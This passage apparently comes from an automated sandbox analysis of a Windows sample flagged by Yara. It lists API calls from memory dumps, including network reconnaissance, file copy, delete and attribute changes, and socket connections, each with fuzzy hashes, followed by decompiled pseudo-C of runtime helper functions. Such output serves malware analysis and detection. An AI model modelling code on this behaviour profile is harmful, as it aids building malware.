                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ChangeCloseFindNotification
                                                                                              • String ID:
                                                                                              • API String ID: 2591292051-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetAdaptersAddresses.IPHLPAPI(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD32F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: AdaptersAddresses
                                                                                              • String ID:
                                                                                              • API String ID: 2506852604-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(?,00000E80), ref: 04BD417B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD541C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RasConnectionNotificationW.RASAPI32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD38CF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ConnectionNotification
                                                                                              • String ID:
                                                                                              • API String ID: 1402429939-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetPerAdapterInfo.IPHLPAPI(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD33E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: AdapterInfo
                                                                                              • String ID:
                                                                                              • API String ID: 3405139893-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MapViewOfFile.KERNEL32(?,?,?,?,?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD15D4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileView
                                                                                              • String ID:
                                                                                              • API String ID: 3314676101-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,?,?,?), ref: 04BD2955
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetNetworkParams.IPHLPAPI(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD3138
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: NetworkParams
                                                                                              • String ID:
                                                                                              • API String ID: 2134775280-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CopyFileW.KERNEL32(?,?,?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD5092
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CopyFile
                                                                                              • String ID:
                                                                                              • API String ID: 1304948518-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileType.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 00ACBEE9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ClassInfo
                                                                                              • String ID:
                                                                                              • API String ID: 3534257612-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 04BD3FDE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Connect
                                                                                              • String ID:
                                                                                              • API String ID: 3144859779-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,?,?), ref: 00ACAAC6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1378638983-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNEL32(?,?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD4BDB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • gethostname.WS2_32(?,00000E80,?,?), ref: 00ACA2FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: gethostname
                                                                                              • String ID:
                                                                                              • API String ID: 144339138-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileMappingW.KERNELBASE(?,00000E80,?,?), ref: 04BD153E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateFileMapping
                                                                                              • String ID:
                                                                                              • API String ID: 524692379-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FormatMessageW.KERNEL32(?,00000E80,?,?), ref: 04BD381E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FormatMessage
                                                                                              • String ID:
                                                                                              • API String ID: 1306739567-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,00000E80,?,?), ref: 04BD536A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileModuleName
                                                                                              • String ID:
                                                                                              • API String ID: 514040917-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD2F90
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DeleteFile
                                                                                              • String ID:
                                                                                              • API String ID: 4033686569-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 04BD1BB9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LibraryLoadShim
                                                                                              • String ID:
                                                                                              • API String ID: 1475914169-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00ACA672
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • setsockopt.WS2_32(?,?,?,?,?), ref: 00ACBAC0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: setsockopt
                                                                                              • String ID:
                                                                                              • API String ID: 3981526788-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNEL32(?,00000E80,?,?), ref: 00ACB932
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: 9befd7faacb0b703706c54cad84078b8d84affa27e775632da5b28f3e0764793
                                                                                              • Instruction ID: c707857511db6b34a5b0d355bc73ed77dfd3c7bf0444304aac4a9f5f264f7446
                                                                                              • Opcode Fuzzy Hash: 9befd7faacb0b703706c54cad84078b8d84affa27e775632da5b28f3e0764793
                                                                                              • Instruction Fuzzy Hash: C801AD72500200ABD610DF1ADC86B22FBE8FB88B20F14C11AED094B745E671F916CBE6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindCloseChangeNotification.KERNEL32(?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 00ACA384
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ChangeCloseFindNotification
                                                                                              • String ID:
                                                                                              • API String ID: 2591292051-0
                                                                                              • Opcode ID: d733f76dd801ef9ce27d91167498c4c61e0aaab4d040b322ee8af411a250726a
                                                                                              • Instruction ID: dd223fb2d53e56db32507942405a433870c5a495dcd6a8b82fb64ce0bd83f430
                                                                                              • Opcode Fuzzy Hash: d733f76dd801ef9ce27d91167498c4c61e0aaab4d040b322ee8af411a250726a
                                                                                              • Instruction Fuzzy Hash: E70184755002449FDB10CF55E884B65FBA4EF50324F18C4AADD498F342D2759444CA62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetIfEntry.IPHLPAPI(?,00000E80,?,?), ref: 04BD02F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Entry
                                                                                              • String ID:
                                                                                              • API String ID: 3940594292-0
                                                                                              • Opcode ID: 88ae57d00e7ccb9cbc3520339ac86ee52e7017ae0b22061e107520ed304a70f9
                                                                                              • Instruction ID: 9dd4d12839749217589b7d17dcefb2f974477a3bf3a6cae965f55c2df9c9d488
                                                                                              • Opcode Fuzzy Hash: 88ae57d00e7ccb9cbc3520339ac86ee52e7017ae0b22061e107520ed304a70f9
                                                                                              • Instruction Fuzzy Hash: 3301AD72500200ABD610DF1ADC86B22FBE8FB88B20F14815AED084B745E635F916CBE6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MessagePeek
                                                                                              • String ID:
                                                                                              • API String ID: 2222842502-0
                                                                                              • Opcode ID: 48581c891e06dc1e10731414bc8415ea6653e44bae507f31c8d671ac549158d1
                                                                                              • Instruction ID: 14cddfa8a4d210d35e46f835f077c61524d21f8e384bd954e57c46a11324e32f
                                                                                              • Opcode Fuzzy Hash: 48581c891e06dc1e10731414bc8415ea6653e44bae507f31c8d671ac549158d1
                                                                                              • Instruction Fuzzy Hash: 6E01B1715006049FDB208F25D884B66FFE4EF04320F08C4EEED864B652E271E458DB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MapViewOfFile.KERNEL32(?,?,?,?,?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD15D4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileView
                                                                                              • String ID:
                                                                                              • API String ID: 3314676101-0
                                                                                              • Opcode ID: 556a282177ca8c77603ddbc944f73cc96effa7e37b81ca1d8e086edb3338c995
                                                                                              • Instruction ID: 6d954b97aeae0381b6db091c022b4c2a2c6586efe4ed7e2673b2600248de4cb3
                                                                                              • Opcode Fuzzy Hash: 556a282177ca8c77603ddbc944f73cc96effa7e37b81ca1d8e086edb3338c995
                                                                                              • Instruction Fuzzy Hash: C9019E755002049FDB20CF59D844B56FFE4EF04321F08C4EAED8A8B252E375A418DB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RasEnumConnectionsW.RASAPI32(?,00000E80,?,?), ref: 04BD222A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ConnectionsEnum
                                                                                              • String ID:
                                                                                              • API String ID: 3832085198-0
                                                                                              • Opcode ID: 4ba650b3a1acaccb8002839792fbb80e39fb053c08b4dc0dec9249b788066923
                                                                                              • Instruction ID: 1a7ec5472018394dcf1b851a5562293c0583d50ed02e6f020179ffc15e5ec790
                                                                                              • Opcode Fuzzy Hash: 4ba650b3a1acaccb8002839792fbb80e39fb053c08b4dc0dec9249b788066923
                                                                                              • Instruction Fuzzy Hash: 1F01A272500200ABD610DF1ADC86B22FBE4FB88B20F14C11AED084B745E631F515CBE5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 04BD54C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: aa7fe95f4fef0e0bf4e655bc0f29fe861ddb78cbaa74b90931867a968c41d453
                                                                                              • Instruction ID: c37477a02c4d491f589c9ccba0709d679f15f01798e0ce8d38d273967e5b6072
                                                                                              • Opcode Fuzzy Hash: aa7fe95f4fef0e0bf4e655bc0f29fe861ddb78cbaa74b90931867a968c41d453
                                                                                              • Instruction Fuzzy Hash: 1B01B171501240AFDB208F1AD844B65FFA0EF04321F08C0DEDD4A4B656E275E458DF62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              • Opcode ID: 6264dbae35cbff9fccd95e6109a541a202876ff0674d97fe39f5a08233cc5de3
                                                                                              • Instruction ID: 504ea82fd74b857cd108a083e4346e7d1c6b1cad86e45bc7a40e90e3ead22ae0
                                                                                              • Opcode Fuzzy Hash: 6264dbae35cbff9fccd95e6109a541a202876ff0674d97fe39f5a08233cc5de3
                                                                                              • Instruction Fuzzy Hash: 9401D1708002489FDB10CF15E889B66FFE4EF50324F19C4AADD498F246D279A448CBB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindClose.KERNEL32(?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD2EC4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 1863332320-0
                                                                                              • Opcode ID: 3a6ca01ea467e35bb0f1ee17bd46d9dd8dde38914c046531e1aca2f2e87fad90
                                                                                              • Instruction ID: e04674dae1513211348327dfa0ff888bb44c7486718b5ce0ec211f5700247a10
                                                                                              • Opcode Fuzzy Hash: 3a6ca01ea467e35bb0f1ee17bd46d9dd8dde38914c046531e1aca2f2e87fad90
                                                                                              • Instruction Fuzzy Hash: 2801F4756002849FDB148F19D884766FFA4EF00320F08C4EADD498F752E275E448DEB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD541C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: e7f714ae6bafe356b93ff0d7156459de71d44679d2220fcf71d257f09afaed55
                                                                                              • Instruction ID: 3b3ea1f3f07289b0350287e0d09b0aa4382afbad37b8944714f48153a9a6075c
                                                                                              • Opcode Fuzzy Hash: e7f714ae6bafe356b93ff0d7156459de71d44679d2220fcf71d257f09afaed55
                                                                                              • Instruction Fuzzy Hash: D701AD756002049FDB208F1AE885B62FFA4EF40221F08C0EADD5A8B656E275F448DF72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,?,?,?), ref: 04BD2955
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 3c22a05a03214bcf151f27a58731da1171ee7fba2a0a53bb4db97054bb6cb611
                                                                                              • Instruction ID: de4c515be6fcd882f24f98187a1e7391d171abcbfa76416d2c51e13a4b29190c
                                                                                              • Opcode Fuzzy Hash: 3c22a05a03214bcf151f27a58731da1171ee7fba2a0a53bb4db97054bb6cb611
                                                                                              • Instruction Fuzzy Hash: 6001A231900344DFDB208F45E844B25FFA0EF54320F08C4EADD890B26AE275A458DB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,?,?), ref: 00ACAAC6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1378638983-0
                                                                                              • Opcode ID: ff127de03e75d0ef482a0cd356f9fe800a627090c303ddebc9fd916ebe4ac28e
                                                                                              • Instruction ID: 42f954f21a1623a7eb635237d463a57c1eee07c5a352ec0316fa871be8b93584
                                                                                              • Opcode Fuzzy Hash: ff127de03e75d0ef482a0cd356f9fe800a627090c303ddebc9fd916ebe4ac28e
                                                                                              • Instruction Fuzzy Hash: 8301D1314006089FDB208F05D984B22FFB0EF14324F08C49ADD8A0B252D275A459DBB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 00ACA724
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ErrorMode
                                                                                              • String ID:
                                                                                              • API String ID: 2340568224-0
                                                                                              • Opcode ID: e4bd2ab41548d5c5dceb81dcf2f041d72839e637e70ba3cbbe00a8d3812b921a
                                                                                              • Instruction ID: f3ce668e07581b946b03f2d88c9f298b0ea696db9b9e5b8ec781d54618ba34ea
                                                                                              • Opcode Fuzzy Hash: e4bd2ab41548d5c5dceb81dcf2f041d72839e637e70ba3cbbe00a8d3812b921a
                                                                                              • Instruction Fuzzy Hash: 5EF0AF744002489FDB208F19D884B61FFB4EF54324F18C0AADD498B652D679A448CFB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DispatchMessageW.USER32(?), ref: 04BD5624
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: DispatchMessage
                                                                                              • String ID:
                                                                                              • API String ID: 2061451462-0
                                                                                              • Opcode ID: 22446dff5d32a42013c8615e7ac5eb4bb3e6f14d52fced841f72f3d8946c0e47
                                                                                              • Instruction ID: b6963fd282320706065ba8b2a516e26b1a4063ea0902736ae82dd4d227688411
                                                                                              • Opcode Fuzzy Hash: 22446dff5d32a42013c8615e7ac5eb4bb3e6f14d52fced841f72f3d8946c0e47
                                                                                              • Instruction Fuzzy Hash: B0F0AF74514244AFEB208F15DC84B61FFA0EF44720F08C0EADD494B252E675B448CFB2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 94%
                                                                                              			E00403E3D(void* __ecx, long _a4) {
                                                                                              				void* _t4;
                                                                                              				void* _t6;
                                                                                              				void* _t7;
                                                                                              				long _t8;
                                                                                              
                                                                                              				_t7 = __ecx;
                                                                                              				_t8 = _a4;
                                                                                              				if(_t8 > 0xffffffe0) {
                                                                                              					L7:
                                                                                              					 *((intOrPtr*)(E00404831())) = 0xc;
                                                                                              					__eflags = 0;
                                                                                              					return 0;
                                                                                              				}
                                                                                              				if(_t8 == 0) {
                                                                                              					_t8 = _t8 + 1;
                                                                                              				}
                                                                                              				while(1) {
                                                                                              					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
                                                                                              					if(_t4 != 0) {
                                                                                              						break;
                                                                                              					}
                                                                                              					__eflags = E00403829();
                                                                                              					if(__eflags == 0) {
                                                                                              						goto L7;
                                                                                              					}
                                                                                              					_t6 = E004068FD(_t7, __eflags, _t8);
                                                                                              					_pop(_t7);
                                                                                              					__eflags = _t6;
                                                                                              					if(_t6 == 0) {
                                                                                              						goto L7;
                                                                                              					}
                                                                                              				}
                                                                                              				return _t4;
                                                                                              			}








                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000001.306979725.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385056435.0000000000AC2000.00000040.00000001.sdmp, Offset: 00AC2000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6c4e97b6b26e63e442ca63bdf1315f19e642ad6004b2878c4082b5e1430e3d88
                                                                                              • Instruction ID: 13137609aa8f4077cc25299573d3aee16a6c235b5e82f99b881742b70a1778dc
                                                                                              • Opcode Fuzzy Hash: 6c4e97b6b26e63e442ca63bdf1315f19e642ad6004b2878c4082b5e1430e3d88
                                                                                              • Instruction Fuzzy Hash: 96D05EB9244A814FD32A8B1CC2A4F953BE4EF51B04F4784FDA8008B6A3C778D981D300
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385056435.0000000000AC2000.00000040.00000001.sdmp, Offset: 00AC2000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d5b8c252bdc6dca1fdedd5caed70754efdb441ab6121727a891a10c0dbcf37a3
                                                                                              • Instruction ID: ac2c9ccde277c088d9dc54ffa302c7706df85aa02eaf77170f73fd8518dafcc3
                                                                                              • Opcode Fuzzy Hash: d5b8c252bdc6dca1fdedd5caed70754efdb441ab6121727a891a10c0dbcf37a3
                                                                                              • Instruction Fuzzy Hash: ADD05E743002814BD715DB1CC294F5937D4AB40B00F0644ECAC008F362C7B8EC81C700
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              C-Code - Quality: 70%
                                                                                              			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                                                              				signed int _v8;
                                                                                              				int _v12;
                                                                                              				void* _v24;
                                                                                              				signed int _t49;
                                                                                              				signed int _t54;
                                                                                              				int _t56;
                                                                                              				signed int _t58;
                                                                                              				short* _t60;
                                                                                              				signed int _t64;
                                                                                              				short* _t68;
                                                                                              				int _t76;
                                                                                              				short* _t79;
                                                                                              				signed int _t85;
                                                                                              				signed int _t88;
                                                                                              				void* _t93;
                                                                                              				void* _t94;
                                                                                              				int _t96;
                                                                                              				short* _t99;
                                                                                              				int _t101;
                                                                                              				int _t103;
                                                                                              				signed int _t104;
                                                                                              				short* _t105;
                                                                                              				void* _t108;
                                                                                              
                                                                                              				_push(__ecx);
                                                                                              				_push(__ecx);
                                                                                              				_t49 =  *0x412014; // 0x8e1d7674
                                                                                              				_v8 = _t49 ^ _t104;
                                                                                              				_t101 = _a20;
                                                                                              				if(_t101 > 0) {
                                                                                              					_t76 = E004080D8(_a16, _t101);
                                                                                              					_t108 = _t76 - _t101;
                                                                                              					_t4 = _t76 + 1; // 0x1
                                                                                              					_t101 = _t4;
                                                                                              					if(_t108 >= 0) {
                                                                                              						_t101 = _t76;
                                                                                              					}
                                                                                              				}
                                                                                              				_t96 = _a32;
                                                                                              				if(_t96 == 0) {
                                                                                              					_t96 =  *( *_a4 + 8);
                                                                                              					_a32 = _t96;
                                                                                              				}
                                                                                              				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
                                                                                              				_v12 = _t54;
                                                                                              				if(_t54 == 0) {
                                                                                              					L38:
                                                                                              					E004018CC();
                                                                                              					return _t54;
